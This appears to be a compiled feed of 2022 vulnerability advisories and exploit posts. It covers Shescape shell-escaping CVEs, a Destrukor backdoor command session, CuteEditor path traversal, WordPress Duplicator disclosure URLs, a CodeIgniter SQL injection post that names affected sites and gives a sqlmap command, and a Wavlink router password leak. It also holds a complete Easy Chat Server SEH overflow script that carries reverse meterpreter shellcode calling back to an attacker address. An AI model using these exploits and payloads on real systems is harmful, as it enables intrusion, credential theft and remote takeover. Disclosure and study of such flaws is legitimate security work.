PyroCMS v3.9 was discovered to contain multiple cross-site scripting (XSS) vulnerabilities.

CVE-2022-35118: AARO-Bugs/AARO-CVE-List.md at master · Accenture/AARO-Bugs

Shescape is a simple shell escape package for JavaScript. Affected versions were found to have insufficient escaping of white space when interpolating output. This issue only impacts users that use the `escape` or `escapeAll` functions with the `interpolation` option set to `true`. The result is that if an attacker is able to include whitespace in their input they can: 1. Invoke shell-specific behaviour through shell-specific special characters inserted directly after whitespace. 2. Invoke shell-specific behaviour through shell-specific special characters inserted or appearing after line terminating characters. 3. Invoke arbitrary commands by inserting a line feed character. 4. Invoke arbitrary commands by inserting a carriage return character. Behaviour number 1 has been patched in [v1.5.7] which you can upgrade to now. No further changes are required. Behaviour number 2, 3, and 4 have been patched in [v1.5.8] which you can upgrade to now. No further changes are required. The best workaround is to avoid having to use the `interpolation: true` option - in most cases using an alternative is possible, see [the recipes](https://github.com/ericcornelissen/shescape#recipes) for recommendations. Alternatively, users may strip all whitespace from user input. Note that this is error prone, for example: for PowerShell this requires stripping `'\u0085'` which is not included in JavaScript's definition of `\s` for Regular Expressions.

Update the test fixtures (used for unit and integration tests) for
PowerShell on Windows to include exmaple where characters need to be
escaped because they appear after whitespace (thus far represented only
by a space character, \` \`). Namely:

- \`>\`, \`\*>\`, \`1>\`, \`2>\`, \`3>\`, \`4>\`, \`5>\`, \`6>\`
- \`<\`
- \`@\`
- \`#\`
- \`-\`
- \`:\`
- \`\]\` (as well as negative tests for \`\[\`)

CVE-2022-31180: Escaping for PowerShell after whitespace with `{interpolation:true}` by ericcornelissen · Pull Request #322 · ericcornelissen/shescape

Shescape is a simple shell escape package for JavaScript. Versions prior to 1.5.8 were found to be subject to code injection on windows. This impacts users that use Shescape (any API function) to escape arguments for cmd.exe on Windows An attacker can omit all arguments following their input by including a line feed character (`'\n'`) in the payload. This bug has been patched in [v1.5.8] which you can upgrade to now. No further changes are required. Alternatively, line feed characters (`'\n'`) can be stripped out manually or the user input can be made the last argument (this only limits the impact).

Compare

Choose a tag to compare

 github-actions released this

v1.5.8

This tag was signed with the committer’s **verified signature**.

 ericcornelissen Eric Cornelissen

GPG key ID: 76670872666D0F19

Learn about vigilant mode.

8b6a0ee

This commit was created on GitHub.com and signed with GitHub’s **verified signature**.

GPG key ID: 4AEE18F83AFDEB23

Learn about vigilant mode.

Compare

Choose a tag to compare

*   Fix escaping of line feed characters for Bash, Dash, and Zsh on Unix systems. (#332)
*   Fix escaping of line feed and carriage return characters for PowerShell and CMD on Windows systems. (#332)
*   Fix escaping of ~ and { for Bash on Unix systems with input strings containing line terminating characters. (#332)

CVE-2022-31179: Release Release v1.5.8 · ericcornelissen/shescape

Backdoor.Win32.Destrukor.20 malware suffers from an unauthenticated remote command execution vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source: https://malvuln.com/advisory/c790749f851d48e66e7d59cc2e451956_B.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.Destrukor.20Vulnerability: Unauthenticated Remote Command ExecutionDescription: The malware listens on TCP port 6969. Third-party adversaries who can reach infected hosts can run commands made available by the backdoor. Remote attackers can read anything the victim types by starting the remote key log command "key_on". Some commands in Polish include "podglad", "dyski", "procesy", "wywiad", "rej_klucze1", "offserver" and many others.Family: DestrukorType: PE32MD5: c790749f851d48e66e7d59cc2e451956Vuln ID: MVID-2022-0627Dropped files: sys32.exeDisclosure: 07/30/2022Exploit/PoC:C:\>nc64.exe x.x.x.x 6969podgladpodglad_ok140922dyskiC:\ - Dysk lokalnyD:\ - CD-ROMprocesyprocesyC:\Windows\System32\sihost.exeC:\Windows\System32\svchost.exeC:\Windows\System32\taskhostw.exeC:\Windows\System32\ctfmon.exeC:\Windows\explorer.exeC:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeC:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exeC:\Program Files\Process Hacker 2\ProcessHacker.exeC:\Windows\System32\vm3dservice.exeC:\Program Files\VMware\VMware Tools\vmtoolsd.exeC:\Windows\System32\cmd.exeC:\Windows\System32\conhost.exeC:\Windows\System32\cmd.exeC:\Windows\System32\conhost.exeC:\Windows\System32\taskhostw.exeC:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\dllhost.exeC:\Windows\System32\cmd.exeC:\Windows\System32\conhost.exeC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Windows\sys32.exewywiad\r\nwywiadWindows 10 EnterpriseggDESKTOP-2C3IQHO192.168.18.125285212778C:\WINDOWS2.0.0rej_klucze1AppEventsAppXBackupContentTypeConsoleControl PanelEnvironmentEUDCKeyboard LayoutNetworkPrintersSoftwareSystemVolatile Environmentkey_on@N@O@T@E@P@A@D@[Enter]@[L Ctrl]@A@[<-BckSpc]@[L Shift]@I@ @[L Shift]@D@O@N@T@ @L@I@K@E@ @Y@O@U@1   ===> "I DONT LIKE YOU"offserverDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Destrukor.20 MVID-2022-0627 Remote Command Execution

CuteEditor For PHP version 6.6 suffers from a directory traversal vulnerability.

    # Exploit Title: CuteEditor for PHP 6.6 - Directory Traversal# Google Dork: N/A# Date: November 17th, 2021# Exploit Author: Stefan Hesselman# Vendor Homepage: http://phphtmledit.com/# Software Link: http://phphtmledit.com/download/phphtmledit.zip# Version: 6.6# Tested on: Windows Server 2019# CVE : N/AThere is a path traversal vulnerability in the browse template feature in CuteEditor for PHP via the "rename file" option. An attacker with access to CuteEditor functions can write HTML templates to any directory inside the web root.File: /phphtmledit/cuteeditor_files/Dialogs/Include_Security.php, Lines: 109-121Vulnerable code:[SNIP]  function ServerMapPath($input_path,$absolute_path,$virtual_path)  {    if($absolute_path!="")    {    return $absolute_path.str_ireplace($virtual_path,"",$input_path);    }    else    {    if(strtoupper(substr(PHP_OS, 0, 3) === 'WIN'))    {    if(empty($_SERVER['DOCUMENT_ROOT']) && !empty($_SERVER['SCRIPT_FILENAME'])) {   $_SERVER['DOCUMENT_ROOT'] = str_replace( '\\', '/', substr($_SERVER['SCRIPT_FILENAME'], 0, 0 - strlen($_SERVER['PHP_SELF'])));} if(empty($_SERVER['DOCUMENT_ROOT']) && !empty($_SERVER['PATH_TRANSLATED'])) {   $_SERVER['DOCUMENT_ROOT'] = str_replace( '\\', '/', substr(str_replace('\\\\', '\\', $_SERVER['PATH_TRANSLATED']), 0, 0 - strlen($_SERVER['PHP_SELF'])));}        return $_SERVER["DOCUMENT_ROOT"].$input_path;    }    else    {      return ucfirst($_SERVER["DOCUMENT_ROOT"]).$input_path;     }    }  }[SNIP]ServerMapPath() takes 3 arguments: $input_path, $absolute_path, and $virtual_path and is used, among others, in the browse_template.php file.File:/phphtmledit/cuteeditor_files/Dialogs/browse_Template.php, Lines: 47-56Vulnerable function (renamefile, line 57):[SNIP]switch ($action){[SNIP]  case "renamefile":    rename(ServerMapPath($_GET["filename"],$AbsoluteTemplateGalleryPath,$TemplateGalleryPath),ServerMapPath($_GET["newname"],$AbsoluteTemplateGalleryPath,$TemplateGalleryPath));    print "<script language=\"javascript\">parent.row_click('".$_GET["newname"]."');</script>";    break;[SNIP]$input_path is $_GET["filename"] and is under control of the attacker. If an attacker uploads and renames the HTML template to '..\..\..\poc.html', it becomes:C:\Inetpub\wwwroot\..\..\..\poc.htmlFinal result: writes poc.html to the webroot.STEPS:1. Create a poc.html file (XSS PoC will do).<HTML><title>Path Traversal PoC</title><BODY><h1>PoC</h1><script>alert('directory traversal');</script></BODY></HTML>2. Upload poc.html via the "Insert Templates" page using the "Upload files" option.3. Select poc.html and select "Rename File".4. Click on the pencil icon to the right of the poc.html file.5. Rename file to "..\..\..\poc.html".6. Press OK. poc.html is written three directories up.This may require more or less dot dot slash (..\ or ../) depending on the size of your directory tree. Adjust slashes as needed.

CuteEditor For PHP 6.6 Directory Traversal

WordPress Duplicator plugin versions 1.4.6 and below suffer from a backup disclosure vulnerability.

    # Exploit Title: WordPress Plugin Duplicator 1.4.6 - Unauthenticated Backup Download# Google Dork: N/A# Date: 07.27.2022# Exploit Author: SecuriTrust# Vendor Homepage: https://snapcreek.com/# Software Link: https://wordpress.org/plugins/duplicator/# Version: < 1.4.7# Tested on: Linux, Windows# CVE : CVE-2022-2551# Reference: https://securitrust.fr# Reference: https://github.com/SecuriTrust/CVEsLab/CVE-2022-2551#Product:WordPress Plugin Duplicator < 1.4.7#Vulnerability:1-It allows an attacker to download the backup file.#Proof-Of-Concept:1-Backup download.The backup file can be downloaded using the "is_daws" parameter.http://[PATH]/backups-dup-lite/dup-installer/main.installer.php

WordPress Duplicator 1.4.6 Backup Disclosure

WordPress Duplicator plugin versions 1.4.7 and below suffer from an information disclosure vulnerability.

    # Exploit Title: WordPress Plugin Duplicator 1.4.7 - Information Disclosure# Google Dork: N/A# Date: 07.27.2022# Exploit Author: SecuriTrust# Vendor Homepage: https://snapcreek.com/# Software Link: https://wordpress.org/plugins/duplicator/# Version: <= 1.4.7# Tested on: Linux, Windows# CVE : CVE-2022-2552# Reference: https://securitrust.fr# Reference: https://github.com/SecuriTrust/CVEsLab/CVE-2022-2552#Product:WordPress Plugin Duplicator <= 1.4.7#Vulnerability:1-Some system information may be disclosure.#Proof-Of-Concept:1-System information.Some system information is obtained using the "view" parameter.http://[PATH]/backups-dup-lite/dup-installer/main.installer.php

WordPress Duplicator 1.4.7 Information Disclosure

CodeIgniter CMS version 4.2.0 suffers from a remote SQL injection vulnerability.

    [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]                                                                                      [+]Exploit Title    : CodeIgniter CMS Version 4.2.0  Sql Injection Vulnerability                         [+]                                                                                         [+]Exploit Author   : E1.Coders                                           [+]                                                                                          [+]Vendor Homepage  : https://www.codeigniter.com/                                       [+]                                                                                       [+]Google Dork ONE  : searchResult/?title=[+]    [+]Google Dork Two  : Job/searchResult/?title=  [+]                                                                                     [+]Date             : 15 / 05 / 2022                                                                [+]                                                                                     [+]Tested On        : windows + linux                                              [+]                                                                                        [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~>DESCRITION   <~ ~ ~ [+] [+] CodeIgniter CMS suffers from a remote SQL injection vulnerability. [+] "codeigniter vulnerability ::$DATA view source code"[+] Note that this find contains information about the site.[+] CodeIgniter CMS SQL injection vulnerabilities were found and confirmed in the software as an anonymous user.[+] A successful attack could allow an unknown attacker to access information such as username and password hashes stored in the database.[+] The following URLs and parameters have been confirmed to suffer from SQL injection.                                                                                        [+] [+]~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~>  Location   <~ ~ ~                           [+] SQL ERROR Location                                                                                        [+] http://www.site.com/Job/searchResult/?title=[SQL]                                              [+] [+]~ ~ ~~ ~ ~~  ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~ ~~ ~ ~~ ~ ~~ ~~~~~~ ~~ ~>   DEMO      <~ ~ ~                       [+][+][+] ERROR : https://[removed].com/Job/searchResult/?title=123%27[+][+] ERROR : https://[removed].com/Job/city/%D8%A7%D8%B3%D8%AA%D8%AE%D8%AF%D8%A7%D9%85-%D9%85%D8%B4%D9%87%D8%AF'  (OR= or ==)[+][+] ERROR : https://[removed].ir/?per_page=400%2[+][+] ERROR : https://[removed].ir/Job/search/NULL/%D8%A2%D8%A8%D8%A7%D8%AF%D8%A7%D9%86'/NULL/NULL/0[+] [+] ERROR : https://[removed].com/login/       (username = '  Password = ')[+][+] ERROR : https://[removed].com/search.php?search=1'[+][+] ERROR : https://[removed].com/news.php?p=7251'[+][+] ERROR : https://[removed].com/employe/show.php?cvid=14088'[+][+] ERROR : https://[removed].com/states/%D8%AA%D9%87%D8%B1%D8%A7%D9%86'[+][+] ERROR : https://[removed].com/fa/index.asp?p=search&search=1[+][+] ERROR : https://[removed].com/fa/FormView/1026'[+][+] ERROR : https://[removed].com/fa/formview/1030' [+] And Google More . . . \ .[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]  Methode Attack :[+]  [+] Step 1 : Enter the URL of the page that has the problem of sql injection attacks[+] [+] Step 2 :  Add a variable "  OR ' to the end of  the URL "request"[+] To display the PHP error related to not controlling the functions that cause the attacker to attack  '[+] [+] Step 3 :  Use sqlmap: python sqlmap.py -u "https://[removed].com/Job/searchResult/?title=123"[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] About CMS :[+] [+] Codeigniter is an open source web software framework used to build dynamic websites. [+] This framework, which is written in PHP language, [+] accelerates the development of software by coding from the beginning. This acceleration is done by the framework's libraries, [+] many of which make common tasks simple. The first public release of CodeIgniter was on February 28, 2006[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] Explanation of vulnerability :[+] [+] The remote attacker can test the SQL Inject attack by injecting a 'variable' and after displaying the PHP error related to not controlling the functions that cause the SQL Inject attack[+] And the attacker can execute attacks with SQL Inject commands or execute attacks with ready tools such as Squat Map.[+] [+] All different parts of the site have this security problem[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] Solution :[+] [+] [+] Use parameter input validation to be modified to prevent attacks[+] "codeigniter vulnerability ::$DATA view source code"[+] [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]

CodeIgniter CMS 4.2.0 SQL Injection

Easy Chat Server version 3.1 remote stack buffer overflow exploit.

    # Exploit Title: Easy Chat Server 3.1 - Remote Stack Buffer Overflow (SEH)# Exploit Author: r00tpgp @ http://www.r00tpgp.com# Usage: python easychat-exploit.py <victim-ip> <port># Spawns reverse meterpreter LHOST=192.168.0.162 LPORT=1990# CVE: CVE-2004-2466 # Installer: http://www.echatserver.com/# Tested on: Microsoft Windows 11 Pro x86-64 (10.0.22000 N/A Build 22000)#!/usr/bin/pythonimport sys, socket, time host = sys.argv[1] # Recieve IP from userport = int(sys.argv[2]) # Recieve Port from user #msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.162 LPORT=1990 -f python -b "\x00\x20"buf =  ""buf += "\xbe\x4e\xdd\xd4\x27\xd9\xe9\xd9\x74\x24\xf4\x5b\x29"buf += "\xc9\xb1\x54\x31\x73\x13\x83\xc3\x04\x03\x73\x41\x3f"buf += "\x21\xdb\xb5\x3d\xca\x24\x45\x22\x42\xc1\x74\x62\x30"buf += "\x81\x26\x52\x32\xc7\xca\x19\x16\xfc\x59\x6f\xbf\xf3"buf += "\xea\xda\x99\x3a\xeb\x77\xd9\x5d\x6f\x8a\x0e\xbe\x4e"buf += "\x45\x43\xbf\x97\xb8\xae\xed\x40\xb6\x1d\x02\xe5\x82"buf += "\x9d\xa9\xb5\x03\xa6\x4e\x0d\x25\x87\xc0\x06\x7c\x07"buf += "\xe2\xcb\xf4\x0e\xfc\x08\x30\xd8\x77\xfa\xce\xdb\x51"buf += "\x33\x2e\x77\x9c\xfc\xdd\x89\xd8\x3a\x3e\xfc\x10\x39"buf += "\xc3\x07\xe7\x40\x1f\x8d\xfc\xe2\xd4\x35\xd9\x13\x38"buf += "\xa3\xaa\x1f\xf5\xa7\xf5\x03\x08\x6b\x8e\x3f\x81\x8a"buf += "\x41\xb6\xd1\xa8\x45\x93\x82\xd1\xdc\x79\x64\xed\x3f"buf += "\x22\xd9\x4b\x4b\xce\x0e\xe6\x16\x86\xe3\xcb\xa8\x56"buf += "\x6c\x5b\xda\x64\x33\xf7\x74\xc4\xbc\xd1\x83\x2b\x97"buf += "\xa6\x1c\xd2\x18\xd7\x35\x10\x4c\x87\x2d\xb1\xed\x4c"buf += "\xae\x3e\x38\xf8\xa4\xa8\x03\x55\xb8\x8a\xec\xa4\xb9"buf += "\xcd\x2a\x21\x5f\x81\xe2\x62\xf0\x61\x53\xc3\xa0\x09"buf += "\xb9\xcc\x9f\x29\xc2\x06\x88\xc3\x2d\xff\xe0\x7b\xd7"buf += "\x5a\x7a\x1a\x18\x71\x06\x1c\x92\x70\xf6\xd2\x53\xf0"buf += "\xe4\x02\x02\xfa\xf4\xd2\xaf\xfa\x9e\xd6\x79\xac\x36"buf += "\xd4\x5c\x9a\x98\x27\x8b\x98\xdf\xd7\x4a\xa9\x94\xe1"buf += "\xd8\x95\xc2\x0d\x0d\x16\x13\x5b\x47\x16\x7b\x3b\x33"buf += "\x45\x9e\x44\xee\xf9\x33\xd0\x11\xa8\xe0\x73\x7a\x56"buf += "\xde\xb3\x25\xa9\x35\xc0\x22\x55\xcb\xe4\x8a\x3e\x33"buf += "\xa8\x2a\xbf\x59\x28\x7b\xd7\x96\x07\x74\x17\x56\x82"buf += "\xdd\x3f\xdd\x42\xaf\xde\xe2\x4f\x71\x7f\xe2\x63\xaa"buf += "\x96\x6d\x84\x4d\x97\x8f\xb9\x9b\xae\xe5\xfa\x1f\x95"buf += "\xf6\xb1\x02\xbc\x9c\xb9\x11\xbe\xb4"junk = "A"*217nseh = "\xeb\x06\x90\x90" # short jump 6 bytesseh = "\x86\xae\x01\x10" # pop pop ret 1001AE86 SSLEAY32.DLLnops = "\x90"*16header = (        "GET /chat.ghp?username=" + junk + nseh + seh + nops + buf + "&password=&room=1&sex=1 HTTP/1.1\r\n"        "User-Agent: Mozilla/4.0\r\n"        "Host: 192.168.1.136:80\r\n"        "Accept-Language: en-us\r\n"        "Accept-Encoding: gzip, deflate\r\n"        "Referer: http://192.168.1.136\r\n"        "Connection: Keep-Alive\r\n\r\n"        )client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Declare a TCP socketclient.connect((host, port)) # Connect to user supplied port and IP addressclient.send(header) # Send the user command with a variable length nameclient.close() # Close the Connection

Easy Chat Server 3.1 Buffer Overflow

Wavlink WN530HG4 suffers from a password disclosure vulnerability.

Change Mirror Download

    # Exploit Title: Wavlink WN530HG4 - Password Disclosure# Date: 2022-06-12# Exploit Author: Ahmed Alroky# Author Company : AIactive# Version: M30HG4.V5030.191116# Vendor home page : wavlink.com# Authentication Required: No# CVE : CVE-2022-34047# Tested on: Windows# Exploitview-source:http://IP_address/set_safety.shtml?r=52300search for var syspasswd="you will find the username and the password

Tag

#windows